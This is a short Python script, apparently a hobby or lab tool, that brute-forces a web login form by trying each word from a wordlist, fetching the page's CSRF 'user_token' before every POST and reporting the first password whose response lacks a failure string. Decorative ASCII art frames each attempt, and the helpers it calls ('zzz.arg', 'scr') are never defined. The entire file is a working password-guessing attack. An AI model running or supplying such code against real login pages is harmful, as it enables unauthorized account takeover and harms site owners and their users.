import requests
from bs4 import BeautifulSoup

#TARGET_URL = "http://10.33.235.130:8080/login.php"
#USERNAME = "admin"
PASS_LIST = zzz.arg(0, "wordlist.txt")
#CHECK = "Login failed"

TARGET_URL = input("Target: ")
USERNAME = input("Username: ")
CHECK = input("Check: ")

with open(PASS_LIST, "r") as file:
  PASS_LIST = file.read().split("\n")

def frame(text):
  scr.clear()
  scr.print_center(f"""\n\n\n
  　  /) /)
　　(＾◡＾๑)
┏ • 〇 - 〇- • - • - • - • - • - ღ❦ღ┓
  """)
  scr.print_center(f"Trying: {text}")
  scr.print_center("\n┗ღ❦ღ • - • - • - • - • - • - • - •  ┛")
  
  scr.print_center(
    r"""        ヽ(•.•`)ﾉ
           |  |
           /  \ """)

def attack(session):
  for word in PASS_LIST:
    frame(word)
    page = session.get(TARGET_URL)
    parsed = BeautifulSoup(page.text, 'html.parser')
    user_token = parsed.find('input', {'name': 'user_token'})['value']
    payload = {
      'username': USERNAME,
      'password': word,
      'user_token': user_token,
      'Login': 'Login'
    }
    res = session.post(TARGET_URL, data=payload)
    if CHECK not in res.text:
      return word
  
  return None

def not_found():
  pass

def found(password):
  scr.clear()
  scr.br()
  scr.br()
  scr.br()
  scr.print_center("Found password!!")
  scr.print_center(r"""
    /\/\
   ( •.•)  
  ./づ [red]{}[/red]
  """.format(password))

with requests.Session() as session:
  res = attack(session)
  if res is None:
    not_found()
  else:
    found(res)

